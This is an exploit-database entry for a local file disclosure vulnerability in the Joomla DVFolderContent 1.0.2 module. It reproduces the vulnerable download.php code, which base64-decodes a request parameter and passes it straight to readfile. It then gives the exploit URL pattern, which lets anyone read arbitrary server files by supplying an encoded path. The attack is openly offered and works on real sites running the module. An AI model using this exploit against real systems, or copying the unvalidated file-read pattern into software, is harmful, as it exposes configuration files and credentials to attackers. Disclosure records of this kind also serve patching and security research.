Joomla DVFolderContent 1.0.2 Local File Disclosure Vulnerability

2016-10-03T00:00:00
ID 1337DAY-ID-25236
Type zdt
Reporter Mojtaba MobhaM
Modified 2016-10-03T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ######################
# Exploit Title : Joomla DVFolderContent V1.0.2 Module - Local File Disclosure
# Exploit Author :  Persian Hack Team
# Vendor Homepage : http://www.dvextensions.de/en/extensions/dvfoldercontent
# Category [ Webapps ]
# Tested on [ Win ]
# Version : V1.0.2
# Date 2016/10/01
######################
 
PoC
The Vulnerable page is
/modules/mod_dvfoldercontent/download.php
 
$file = base64_decode($_GET['f']);
if (is_file($file)) {
  $fileinfo = pathinfo($file);
  $filename = $fileinfo['basename'];
  $filesize = filesize($file);
  header("Content-Type: application/octet-stream; name=$filename");
  header("Content-Disposition: attachment; filename=$filename");
  header("Content-Length: $filesize");
  header("Pragma: no-cache");
  readfile($file);

Exploit:
http://server/modules/mod_dvfoldercontent/download.php?f=base64  

Video : http://persian-team.ir/showthread.php?tid=165&pid=298
######################
# Discovered by :  Mojtaba MobhaM

#  0day.today [2018-04-10]  #